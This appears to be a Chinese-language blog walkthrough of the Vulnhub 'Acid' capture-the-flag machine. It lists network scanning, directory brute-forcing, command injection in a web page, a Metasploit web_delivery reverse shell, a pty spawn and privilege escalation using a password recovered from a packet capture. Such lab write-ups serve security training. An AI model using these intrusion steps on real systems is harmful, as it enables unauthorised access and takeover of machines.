• Vulnhub Acid


    1、信息收集

    1.1、netdiscover

    netdiscover -i eth0 -r 192.168.118.0/24

    1.2、 Nmap

    nmap -sP -T4 192.168.118.0/24

    nmap -sS -T4 -sV -O -p- 192.168.118.146

    1.3 33447

    view-source:http://192.168.118.146:33447/

     643239334c6d70775a773d3d  ==》 wow.jpg

    1.4 wow.jpg

    notepad++ 打开 

    3761656530663664353838656439393035656533376631366137633631306434

    ==》

    7aee0f6d588ed9905ee37f16a7c610d4

    7aee0f6d588ed9905ee37f16a7c610d4

    MD5 解密==》63425 (后面发现并没什么卵用)

    1.5 dirbuster爆破

    标题俩个路径:

    http://192.168.118.146:33447/Challenge/

    http://192.168.118.146:33447/Challenge/cake.php

    ==>

    /Magic_Box

     再次爆破目录:

    http://192.168.118.146:33447/Challenge/Magic_Box/command.php

     

    2、漏洞挖掘

    命令注入:

    http://192.168.118.146:33447/Challenge/Magic_Box/command.php

    3、 反弹shell

    3.1、请移步:web_delivery

    use exploit/multi/script/web_delivery 

    su: must be run from a terminal

    echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

    python /tmp/asdf.py

    4、权限提升

    cat /etc/passwd,发现需要关注的用户有:acid,saman,root

    find / -user acid 2>/dev/null

    发一个hint.pcapng

    打开后跟踪tcp流

    发现saman的密码:1337hax0r

    su提权到saman、root,获得flag

    再使用sudo -i 提权到root,密码同样是1337hax0r,获得位于root目录的flag.txt

    notepad:

    1、查找acid用户的文件

    find / -user acid 2>/dev/null

    2、使用metasploit反弹shell

    exploit/multi/script/web_delivery 

  • 相关阅读:
    模块3 re + 正则表达式
    模块2
    模块1
    super
    MRO,C3算法
    日志,固定格式
    异常处理,MD5
    类的约束
    反射
    异常处理MR5
  • 原文地址:https://www.cnblogs.com/zhuxr/p/9996426.html
Copyright © 2020-2023  润新知